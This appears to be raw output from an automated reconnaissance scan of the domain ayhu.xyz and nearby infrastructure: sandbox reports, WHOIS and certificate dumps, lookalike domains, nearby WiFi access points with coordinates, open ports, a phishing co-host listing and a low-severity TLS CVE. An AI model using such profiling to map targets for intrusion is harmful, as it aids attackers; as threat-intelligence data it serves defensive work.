| 2023-05-12 02:57:04 | Raw Data from RIRs | No | Hybrid Analysis | 0 | 0 | 3 | 0 | None | [{u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': []}, u'total_processes': 3, u'threat_score': None, u'compromised_hosts': [], u'environment_id': 100, u'major_os_version': None, u'submit_name': u'https://www.moneygeek.com/insurance/health/best-cheap-health-insurance-texas/', u'signatures': [{u'category': u'General', u'origin': u'Binary File', u'identifier': u'binary-16', u'name': u'Drops files marked as clean', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'Antivirus vendors marked dropped file "urlblockindex_1_.bin" as clean (type is "data")\n Antivirus vendors marked dropped file "TarF182.tmp" as clean (type is "data")'}, {u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\Local\\!BrowserEmulation!SharedMemory!Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\VERMGMTBlockListFileMutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_2108"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\URLBLOCK_HASHFILESWITCH_MUTEX"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\URLBLOCK_DOWNLOAD_MUTEX"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\ZonesCacheCounterMutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\ZonesLockedCacheCounterMutex"\n "\\Sessions\\1\\BaseNamedObjects\\IsoScope_83c_IE_EarlyTabStart_0x280_Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\IsoScope_83c_ConnHashTable<2108>_HashTable_Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"\n 
"\\Sessions\\1\\BaseNamedObjects\\IsoScope_83c_IESQMMUTEX_0_303"\n "\\Sessions\\1\\BaseNamedObjects\\IsoScope_83c_IESQMMUTEX_0_331"\n "\\Sessions\\1\\BaseNamedObjects\\{66D0969A-1E86-44CF-B4EC-3806DDDA3B5D}"\n "Local\\InternetShortcutMutex"\n "{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"\n "UpdatingNewTabPageData"\n "Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_2108"\n "IsoScope_83c_ConnHashTable<2108>_HashTable_Mutex"\n "{66D0969A-1E86-44CF-B4EC-3806DDDA3B5D}"\n "IsoScope_83c_IESQMMUTEX_0_519"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"35.229.48.116:443"'}, {u'category': u'Unusual Characteristics', u'origin': u'Binary File', u'identifier': u'binary-37', u'name': u'Drops files inside appdata directory', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 5, u'threat_level': 0, u'type': 8, u'description': u'Dropped file: "J04ZLJNG.txt" - Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\J04ZLJNG.txt]- [targetUID: 00000000-00002108]\n Dropped file: "SM32LH0E.txt" - Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\SM32LH0E.txt]- [targetUID: 00000000-00002108]\n Dropped file: "QA9U9LE5.txt" - Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\QA9U9LE5.txt]- [targetUID: 00000000-00003816]'}, {u'category': u'Unusual Characteristics', u'origin': u'Binary File', u'identifier': u'binary-5', u'name': u'Drops cabinet archive files', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'"57C8EDB95DF3F0AD4EE2DC2B8CFD4157" has type "Microsoft Cabinet archive data 4817 bytes 1 file"\n "77EC63BDA74BD0D0E0426DC8F8008506" has type "Microsoft Cabinet archive data 62397 bytes 1 
file"\n "CabF181.tmp" has type "Microsoft Cabinet archive data 62397 bytes 1 file"'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"urlblockindex_1_.bin" has type "data"- [targetUID: N/A]\n "6BADA8974A10C4BD62CC921D13E43B18_1DC6D7385EA816C957BA2B715AC5C442" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\6BADA8974A10C4BD62CC921D13E43B18_1DC6D7385EA816C957BA2B715AC5C442]- [targetUID: 00000000-00002108]\n "77EC63BDA74BD0D0E0426DC8F8008506" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\77EC63BDA74BD0D0E0426DC8F8008506]- [targetUID: 00000000-00003816]\n "RecoveryStore._45126F33-4631-11ED-9DDA-080027F73AF2_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "search_2_.json" has type "ASCII text with no line terminators"- [targetUID: N/A]\n "2D02C83649E3FA2E79606E9C14752B3F" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\Content\\2D02C83649E3FA2E79606E9C14752B3F]- [targetUID: 00000000-00003816]\n "J04ZLJNG.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\J04ZLJNG.txt]- [targetUID: 00000000-00002108]\n "80237EE4964FC9C409AAF55BF996A292_D46D6FA25B74360E1349F9015B5CCE53" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\Content\\80237EE4964FC9C409AAF55BF996A292_D46D6FA25B74360E1349F9015B5CCE53]- [targetUID: 00000000-00002108]\n "~DFA8CA6D99ACF67640.TMP" has type "data"- Location: [%TEMP%\\~DFA8CA6D99ACF67640.TMP]- [targetUID: 00000000-00002108]\n "NewErrorPageTemplate_1_" has type "UTF-8 Unicode (with BOM) text with CRLF line terminators"- [targetUID: N/A]\n "search__0633EE93-D776-472f-A0FF-E1416B8B2E3A_.ico" has type "MS 
Windows icon resource - 1 icon 32x32 32 bits/pixel"- [targetUID: N/A]\n "7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\Content\\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776]- [targetUID: 00000000-00003816]\n "dnserror_1_" has type "HTML document UTF-8 Unicode (with BOM) text with CRLF line terminators"- [targetUID: N/A]\n "57C8EDB95DF3F0AD4EE2DC2B8CFD4157" has type "Microsoft Cabinet archive data 4817 bytes 1 file"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\57C8EDB95DF3F0AD4EE2DC2B8CFD4157]- [targetUID: 00000000-00003816]\n "6BADA8974A10C4BD62CC921D13E43B18_711ED44619924BA6DC33E69F97E7FF63" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\6BADA8974A10C4BD62CC921D13E43B18_711ED44619924BA6DC33E69F97E7FF63]- [targetUID: 00000000-00002108]\n "en-US.4" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Internet Explorer\\DomainSuggestions\\en-US.4]- [targetUID: 00000000-00002108]\n "favicon_3_.ico" has type "MS Windows icon resource - 1 icon 32x32 32 bits/pixel"- [targetUID: N/A]'}, {u'category': u'Network Related', u'origin': u'File/Memory', u'identifier': u'string-3', u'name': u'Found potential URL in binary/memory', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 2, u'description': u'Pattern match: "https://www.moneygeek.com/insurance/health/best-cheap-health-insurance-texas/"\n Pattern match: "https://www.moneygeek.com"\n Pattern match: "www.moneygeek.com"'}, {u'category': u'Network Related', u'origin': u'File/Memory', u'identifier': u'string-102', u'name': u'Decrypted SSL network traffic', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1573', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1573', u'relevance': 3, u'threat_level': 0, u'type': 2, 
u'description': u'"GET /insurance/health/best-cheap-health-insurance-texas/ HTTP/1.1\nAccept: text/html, application/xhtml+xml, */*\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nHost: www.moneygeek.com\nDNT: 1\nConnection: Keep-Alive"'}, {u'category': u'External Systems', u'origin': u'External System', u'identifier': u'avtest-1', u'name': u'Sample was identified as clean by Antivirus engines', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 12, u'description': u'0/89 Antivirus vendors marked sample as malicious (0% detection rate)'}], u'threat_level': 0, u'size': None, u'job_id': u'6340254340d16e0a2d1801df', u'target_url': None, u'interesting': False, u'error_type': None, u'state': u'SUCCESS', u'entrypoint': None, u'mitre_attcks': [{u'parent': None, u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1573', u'suspicious_identifiers': [], u'attck_id': u'T1573', u'malicious_identifiers': [], u'malicious_identifiers_count': 0, u'technique': u'Encrypted Channel', u'informative_identifiers': [], u'tactic': u'Command and Control', u'informative_identifiers_count': 1, u'suspicious_identifiers_count': 0}], u'certificates': [], u'hosts': [u'35.229.48.116'], u'sha256': u'3915ff7b4886499db28474c559936c4f13989a8c13d55ca8942d98b74060b5bf', u'sha512': u'ba6b1d0c54260ad883d3a8f976592dfaebbbae2be1a6a847c63838eacbc4d35c133e0ffead79115d306f43850ad6025f535973fd2d6cb6dc07c902b1db39db31', u'image_file_characteristics': [], u'submissions': [{u'url': u'https://www.moneygeek.com/insurance/health/best-cheap-health-insurance-texas/', u'submission_id': u'634d90f65d75c6515c6735fa', u'created_at': u'2022-10-17T17:29:26+00:00', u'filename': None}, {u'url': u'https://www.moneygeek.com/insurance/health/best-cheap-health-insurance-texas/', u'submission_id': u'6345893916c2ca0c6f6ab2fc', u'created_at': 
u'2022-10-11T15:18:17+00:00', u'filename': None}, {u'url': u'https://www.moneygeek.com/insurance/health/best-cheap-health-insurance-texas/', u'submission_id': u'6340254340d16e0a2d1801e0', u'created_at': u'2022-10-07T13:10:27+00:00', u'filename': None}], u'analysis_start_time': u'2022-10-07T13:10:28+00:00', u'tags': [], u'imphash': u'Unknown', u'total_network_connections': 1, | 35.229.48.116 |
| 2023-05-12 02:58:39 | Raw Data from RIRs | No | Hybrid Analysis | 0 | 0 | 3 | 0 | None | [{u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': []}, u'total_processes': 3, u'threat_score': None, u'compromised_hosts': [], u'environment_id': 120, u'major_os_version': None, u'submit_name': u'https://sofrescousa.com/', u'signatures': [{u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"23.227.38.65:443"\n "162.159.134.68:443"\n "142.251.215.234:443"\n "142.250.217.106:443"\n "142.251.33.72:443"\n "104.18.11.207:443"\n "157.240.19.26:443"\n "134.122.45.153:443"\n "162.159.130.71:443"\n "172.67.143.128:443"\n "142.251.33.99:443"\n "142.250.217.110:443"\n "108.177.98.154:443"\n "172.217.14.194:443"\n "142.251.215.226:443"\n "23.227.38.33:443"\n "104.17.202.53:443"\n "52.84.52.94:443"\n "104.18.40.169:443"\n "104.21.73.210:443"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-51', u'name': u'Queries DNS server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/004', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.004', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"aly.jst.ai"\n "app.sealsubscriptions.com"\n "cdn.jst.ai"\n "cdn.shopify.com"\n "cloud.goldendev.win"\n "forms.soundestlink.com"\n "maxcdn.bootstrapcdn.com"\n "monorail-edge.shopifysvc.com"\n "my.jst.ai"\n "omnisnippet1.com"\n "scripttags.jst.ai"\n "shop.app"\n "sofrescousa.com"\n "widgets.automizely.com"\n "www.goldendev.win"'}, {u'category': u'General', u'origin': u'Binary File', u'identifier': u'binary-16', u'name': u'Drops files marked as clean', u'attck_id_wiki': None, u'threat_level_human': 
| 34.74.170.74 |
| 2023-05-12 03:16:17 | Similar Domain | Yes | Tool - DNSTwist | 1 | 0 | 1 | 0 | None | aahu.xyz | ayhu.xyz |
| 2023-05-12 03:18:58 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | padt-1 (Net ID: 00:01:21:1F:75:30) | 33.336199,-111.89446440830702 |
| 2023-05-12 03:18:54 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | logitec-a028e9 (Net ID: 00:01:8E:A0:28:E8) | 50.1188, 8.6843 |
| 2023-05-12 03:02:26 | Software Used | Yes | Tool - Wappalyzer | 0 | 0 | 2 | 0 | None | Cloudflare Turnstile | www.ayhu.xyz |
| 2023-05-12 02:46:42 | Physical Location | No | Fraudguard | 0 | 0 | 3 | 0 | None | United States, South Carolina, North Charleston | 34.148.97.127 |
| 2023-05-12 03:13:09 | Malicious Co-Hosted Site | Yes | OpenPhish | 0 | 0 | 3 | 0 | None | OpenPhish [0101kvmt.github.io]
https://www.openphish.com/feed.txt | 0101kvmt.github.io |
| 2023-05-12 03:01:06 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.96.116): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.96.0/24 |
| 2023-05-12 03:31:34 | Affiliate - Email Address | No | E-Mail Address Extractor | 0 | 0 | 3 | 0 | None | proxy@whoisprotectservice.com | Domain Name: AYHA.XYZ
Registry Domain ID: D293590239-CNIC
Registrar WHOIS Server: whois.discount-domain.com
Registrar URL: http://www.onamae.com
Updated Date: 2022-04-30T16:37:38.0Z
Creation Date: 2022-04-25T16:34:12.0Z
Registry Expiry Date: 2024-04-25T23:59:59.0Z
Registrar: GMO Internet Group, Inc. d/b/a Onamae.com
Registrar IANA ID: 49
Domain Status: ok https://icann.org/epp#ok
Domain Status: autoRenewPeriod https://icann.org/epp#autoRenewPeriod
Registrant Organization: Whois Privacy Protection Service by onamae.com
Registrant State/Province: Tokyo
Registrant Country: JP
Registrant Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Admin Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Tech Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Name Server: NS1.GM111.PARKLOGIC.COM
Name Server: NS2.GM111.PARKLOGIC.COM
DNSSEC: unsigned
Billing Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Registrar Abuse Contact Email: abuse@gmo.jp
Registrar Abuse Contact Phone: +81.337709199
URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/
>>> Last update of WHOIS database: 2023-05-12T03:17:37.0Z <<<
For more information on Whois status codes, please visit https://icann.org/epp
>>> IMPORTANT INFORMATION ABOUT THE DEPLOYMENT OF RDAP: please visit
https://www.centralnic.com/support/rdap <<<
The Whois and RDAP services are provided by CentralNic, and contain
information pertaining to Internet domain names registered by our
our customers. By using this service you are agreeing (1) not to use any
information presented here for any purpose other than determining
ownership of domain names, (2) not to store or reproduce this data in
any way, (3) not to use any high-volume, automated, electronic processes
to obtain data from this service. Abuse of this service is monitored and
actions in contravention of these terms will result in being permanently
blacklisted. All data is (c) CentralNic Ltd (https://www.centralnic.com)
Access to the Whois and RDAP services is rate limited. For more
information, visit https://registrar-console.centralnic.com/pub/whois_guidance.
Domain Name: ayha.xyz
Registry Domain ID: D293590239-CNIC
Registrar WHOIS Server: whois.discount-domain.com
Registrar URL: http://www.onamae.com
Updated Date: 2023-04-26T06:12:30Z
Creation Date: 2022-04-25T16:34:14Z
Registrar Registration Expiration Date: 2023-04-25T23:59:59Z
Registrar: GMO INTERNET, INC.
Registrar IANA ID: 49
Registrar Abuse Contact Email: abuse@gmo.jp
Registrar Abuse Contact Phone: +81.337709199
Domain Status: ok https://icann.org/epp#ok
Registry Registrant ID: E4D57C1767DC8C
Registrant Name: Whois Privacy Protection Service by onamae.com
Registrant Organization: Whois Privacy Protection Service by onamae.com
Registrant Street: 26-1 Sakuragaoka-cho
Registrant Street: Cerulean Tower 11F
Registrant City: Shibuya-ku
Registrant State/Province: Tokyo
Registrant Postal Code: 150-8512
Registrant Country: JP
Registrant Phone: +81.354562560
Registrant Phone Ext:
Registrant Fax:
Registrant Fax Ext:
Registrant Email: proxy@whoisprotectservice.com
Registry Admin ID: E4D57C3C00BE9C
Admin Name: Whois Privacy Protection Service by onamae.com
Admin Organization: Whois Privacy Protection Service by onamae.com
Admin Street: 26-1 Sakuragaoka-cho
Admin Street: Cerulean Tower 11F
Admin City: Shibuya-ku
Admin State/Province: Tokyo
Admin Postal Code: 150-8512
Admin Country: JP
Admin Phone: +81.354562560
Admin Phone Ext:
Admin Fax:
Admin Fax Ext:
Admin Email: proxy@whoisprotectservice.com
Registry Tech ID: E4D27D6C252D99
Tech Name: Whois Privacy Protection Service by onamae.com
Tech Organization: Whois Privacy Protection Service by onamae.com
Tech Street: 26-1 Sakuragaoka-cho
Tech Street: Cerulean Tower 11F
Tech City: Shibuya-ku
Tech State/Province: Tokyo
Tech Postal Code: 150-8512
Tech Country: JP
Tech Phone: +81.354562560
Tech Phone Ext:
Tech Fax:
Tech Fax Ext:
Tech Email: proxy@whoisprotectservice.com
Name Server: ns1.gm111.parklogic.com
Name Server: ns2.gm111.parklogic.com
DNSSEC: unsigned
URL of the ICANN WHOIS Data Problem Reporting System: http://wdprs.internic.net/
>>> Last update of WHOIS database: 2023-04-26T06:12:30Z <<<
For more information on Whois status codes, please visit https://icann.org/epp |
| 2023-05-12 03:23:29 | Open TCP Port | No | Pulsedive | 0 | 0 | 3 | 0 | None | 188.114.96.10:8080 | 188.114.96.0/24 |
| 2023-05-12 02:44:21 | Co-Hosted Site | No | SSL Certificate Analyzer | 0 | 0 | 2 | 0 | None | www.github.com | 185.199.108.153 |
| 2023-05-12 02:59:21 | SSL Certificate - Raw Data | No | Certificate Transparency | 1 | 0 | 1 | 0 | None | Certificate:
Data:
Version: 3 (0x2)
Serial Number:
04:88:a7:3c:db:48:4e:7a:5b:30:55:60:8f:23:20:34:8b:3f
Signature Algorithm: sha256WithRSAEncryption
Issuer: C=US, O=Let's Encrypt, CN=R3
Validity
Not Before: Dec 13 19:16:54 2022 GMT
Not After : Mar 13 19:16:53 2023 GMT
Subject: CN=*.ayhu.xyz
Subject Public Key Info:
Public Key Algorithm: rsaEncryption
RSA Public-Key: (2048 bit)
Modulus:
Exponent: 65537 (0x10001)
X509v3 extensions:
X509v3 Key Usage: critical
Digital Signature, Key Encipherment
X509v3 Extended Key Usage:
TLS Web Server Authentication, TLS Web Client Authentication
X509v3 Basic Constraints: critical
CA:FALSE
X509v3 Subject Key Identifier:
11:21:5C:1E:81:22:95:8E:F4:BA:FB:D4:B0:77:CD:45:5F:AE:5E:B1
X509v3 Authority Key Identifier:
keyid:14:2E:B3:17:B7:58:56:CB:AE:50:09:40:E6:1F:AF:9D:8B:14:C2:C6
Authority Information Access:
OCSP - URI:http://r3.o.lencr.org
CA Issuers - URI:http://r3.i.lencr.org/
X509v3 Subject Alternative Name:
DNS:*.ayhu.xyz, DNS:ayhu.xyz
X509v3 Certificate Policies:
Policy: 2.23.140.1.2.1
Policy: 1.3.6.1.4.1.44947.1.1.1
CPS: http://cps.letsencrypt.org
CT Precertificate SCTs:
Signed Certificate Timestamp:
Version : v1 (0x0)
Log ID : 7A:32:8C:54:D8:B7:2D:B6:20:EA:38:E0:52:1E:E9:84:
16:70:32:13:85:4D:3B:D2:2B:C1:3A:57:A3:52:EB:52
Timestamp : Dec 13 20:16:54.437 2022 GMT
Extensions: none
Signature : ecdsa-with-SHA256
Signed Certificate Timestamp:
Version : v1 (0x0)
Log ID : B7:3E:FB:24:DF:9C:4D:BA:75:F2:39:C5:BA:58:F4:6C:
5D:FC:42:CF:7A:9F:35:C4:9E:1D:09:81:25:ED:B4:99
Timestamp : Dec 13 20:16:54.945 2022 GMT
Extensions: none
Signature : ecdsa-with-SHA256
Signature Algorithm: sha256WithRSAEncryption
| ayhu.xyz |
| 2023-05-12 02:44:09 | SSL Certificate - Issued by | No | CertSpotter | 0 | 0 | 1 | 0 | None | C=US,O=Google Trust Services LLC,CN=GTS CA 1P5 | ayhu.xyz |
| 2023-05-12 02:54:03 | Open TCP Port Banner | No | Censys | 0 | 0 | 2 | 0 | None | HTTP/1.1 403 Forbidden
Date: <REDACTED>
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
X-Frame-Options: SAMEORIGIN
Referrer-Policy: same-origin
Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Vary: Accept-Encoding
Server: cloudflare
CF-RAY: 7c5eacee2fce86e1-ORD
Content-Encoding: gzip
| 172.67.135.9 |
| 2023-05-12 02:46:49 | Co-Hosted Site | No | SSL Certificate Analyzer | 0 | 0 | 3 | 0 | None | netlify.app | 104.196.30.220 |
| 2023-05-12 02:58:55 | Raw Data from RIRs | No | Hybrid Analysis | 0 | 0 | 3 | 0 | None | | 34.74.170.74 |
| 2023-05-12 02:57:38 | Vulnerability - CVE Low | Yes | Tool - testssl.sh | 0 | 2 | 1 | 0 | None | CVE-2013-0169
https://nvd.nist.gov/vuln/detail/CVE-2013-0169
Score: 2.6
Description: The TLS protocol 1.1 and 1.2 and the DTLS protocol 1.0 and 1.2, as used in OpenSSL, OpenJDK, PolarSSL, and other products, do not properly consider timing side-channel attacks on a MAC check requirement during the processing of malformed CBC padding, which allows remote attackers to conduct distinguishing attacks and plaintext-recovery attacks via statistical analysis of timing data for crafted packets, aka the "Lucky Thirteen" issue. | battleb0t.xyz |
| 2023-05-12 02:59:44 | Co-Hosted Site - Domain Whois | No | Whois | 2 | 0 | 3 | 0 | None | Domain Name: netlify.app
Registry Domain ID: 2CB5C0CD0-APP
Registrar WHOIS Server: whois.nic.google
Registrar URL: http://www.name.com
Updated Date: 2023-04-11T15:58:16Z
Creation Date: 2018-05-08T22:48:05Z
Registry Expiry Date: 2024-05-08T22:48:05Z
Registrar: Name.com, Inc.
Registrar IANA ID: 625
Registrar Abuse Contact Email: abuse@name.com
Registrar Abuse Contact Phone: +1.7203101849
Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
Registry Registrant ID: REDACTED FOR PRIVACY
Registrant Name: REDACTED FOR PRIVACY
Registrant Organization: Netlify
Registrant Street: REDACTED FOR PRIVACY
Registrant City: REDACTED FOR PRIVACY
Registrant State/Province: CA
Registrant Postal Code: REDACTED FOR PRIVACY
Registrant Country: US
Registrant Phone: REDACTED FOR PRIVACY
Registrant Email: Please query the WHOIS server of the owning registrar identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Registry Admin ID: REDACTED FOR PRIVACY
Admin Name: REDACTED FOR PRIVACY
Admin Organization: REDACTED FOR PRIVACY
Admin Street: REDACTED FOR PRIVACY
Admin City: REDACTED FOR PRIVACY
Admin State/Province: REDACTED FOR PRIVACY
Admin Postal Code: REDACTED FOR PRIVACY
Admin Country: REDACTED FOR PRIVACY
Admin Phone: REDACTED FOR PRIVACY
Admin Email: Please query the WHOIS server of the owning registrar identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Registry Tech ID: REDACTED FOR PRIVACY
Tech Name: REDACTED FOR PRIVACY
Tech Organization: REDACTED FOR PRIVACY
Tech Street: REDACTED FOR PRIVACY
Tech City: REDACTED FOR PRIVACY
Tech State/Province: REDACTED FOR PRIVACY
Tech Postal Code: REDACTED FOR PRIVACY
Tech Country: REDACTED FOR PRIVACY
Tech Phone: REDACTED FOR PRIVACY
Tech Email: Please query the WHOIS server of the owning registrar identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Registry Billing ID: REDACTED FOR PRIVACY
Billing Name: REDACTED FOR PRIVACY
Billing Organization: REDACTED FOR PRIVACY
Billing Street: REDACTED FOR PRIVACY
Billing City: REDACTED FOR PRIVACY
Billing State/Province: REDACTED FOR PRIVACY
Billing Postal Code: REDACTED FOR PRIVACY
Billing Country: REDACTED FOR PRIVACY
Billing Phone: REDACTED FOR PRIVACY
Billing Email: Please query the WHOIS server of the owning registrar identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Name Server: dns1.p01.nsone.net
Name Server: dns2.p01.nsone.net
Name Server: dns3.p01.nsone.net
Name Server: dns4.p01.nsone.net
DNSSEC: unsigned
URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/
>>> Last update of WHOIS database: 2023-05-12T02:59:44Z <<<
For more information on Whois status codes, please visit https://icann.org/epp
Please query the WHOIS server of the owning registrar identified in this
output for information on how to contact the Registrant, Admin, or Tech
contact of the queried domain name.
WHOIS information is provided by Charleston Road Registry Inc. (CRR) solely
for query-based, informational purposes. By querying our WHOIS database, you
are agreeing to comply with these terms
(https://www.registry.google/about/whois-disclaimer.html) and acknowledge
that your information will be used in accordance with CRR's Privacy Policy
(https://www.registry.google/about/privacy.html), so please read those
documents carefully. Any information provided is "as is" without any
guarantee of accuracy. You may not use such information to (a) allow,
enable, or otherwise support the transmission of mass unsolicited,
commercial advertising or solicitations; (b) enable high volume, automated,
electronic processes that access the systems of CRR or any ICANN-Accredited
Registrar, except as reasonably necessary to register domain names or modify
existing registrations; or (c) engage in or support unlawful behavior. CRR
reserves the right to restrict or deny your access to the Whois database,
and may modify these terms at any time.
Please query the WHOIS server of the owning registrar identified in this
output for information on how to contact the Registrant, Admin, or Tech
contact of the queried domain name.
WHOIS information is provided by Charleston Road Registry Inc. (CRR) solely
for query-based, informational purposes. By querying our WHOIS database, you
are agreeing to comply with these terms
(https://www.registry.google/about/whois-disclaimer.html) and acknowledge
that your information will be used in accordance with CRR's Privacy Policy
(https://www.registry.google/about/privacy.html), so please read those
documents carefully. Any information provided is "as is" without any
guarantee of accuracy. You may not use such information to (a) allow,
enable, or otherwise support the transmission of mass unsolicited,
commercial advertising or solicitations; (b) enable high volume, automated,
electronic processes that access the systems of CRR or any ICANN-Accredited
Registrar, except as reasonably necessary to register domain names or modify
existing registrations; or (c) engage in or support unlawful behavior. CRR
reserves the right to restrict or deny your access to the Whois database,
and may modify these terms at any time.
| netlify.app |
| 2023-05-12 02:46:49 | SSL Certificate - Raw Data | No | SSL Certificate Analyzer | 0 | 0 | 3 | 0 | None | Certificate:
Data:
Version: 3 (0x2)
Serial Number:
9d:49:08:08:d4:e9:44:f0:ed:d2:82:b7:e0:6b:90:98
Signature Algorithm: sha256WithRSAEncryption
Issuer: C=GB, ST=Greater Manchester, L=Salford, O=Sectigo Limited, CN=Sectigo RSA Domain Validation Secure Server CA
Validity
Not Before: Apr 27 00:00:00 2023 GMT
Not After : May 27 23:59:59 2024 GMT
Subject: CN=*.cloudwaysapps.com
Subject Public Key Info:
Public Key Algorithm: rsaEncryption
RSA Public-Key: (2048 bit)
Modulus:
00:d1:3a:67:3d:ac:93:fe:a1:38:17:a2:78:ab:33:
a2:2b:b2:61:9e:b0:28:f5:b1:4b:36:8d:ac:be:b1:
c0:fe:fd:0b:68:83:80:c9:b2:6b:9d:ce:40:cb:26:
30:81:2e:8f:4e:77:39:58:cb:20:c2:55:5e:20:7e:
53:22:78:e6:78:4b:04:8a:75:da:4a:51:8e:ae:c5:
7b:1a:6f:d9:5b:ee:cf:33:36:2b:2b:82:8c:3f:b8:
39:3e:ff:79:43:92:54:ec:54:d0:bf:11:c0:cd:11:
b1:92:f3:c3:cd:cc:a8:82:83:49:22:4d:4a:5e:05:
4b:3f:17:54:c9:df:81:d5:41:55:ad:33:2b:a8:09:
08:7f:43:35:1d:1c:dd:5a:53:87:bf:e3:84:b1:0d:
90:8d:c9:d7:3f:49:88:74:31:7a:b1:b0:e7:b3:d9:
25:22:dd:3d:3f:9f:60:d3:32:fe:f8:e6:52:22:4b:
db:21:12:b2:be:42:9c:9a:9f:bb:dc:74:11:17:4a:
63:9f:64:98:d9:12:4a:30:4c:41:ce:02:25:3c:32:
b3:70:72:ea:0c:c3:d1:97:6c:cf:f1:37:08:77:34:
63:17:f5:f8:ad:16:1a:eb:8c:b1:aa:63:18:20:3b:
38:58:f9:e1:92:9a:3b:73:9b:93:2b:b7:f8:4c:52:
14:d5
Exponent: 65537 (0x10001)
X509v3 extensions:
X509v3 Authority Key Identifier:
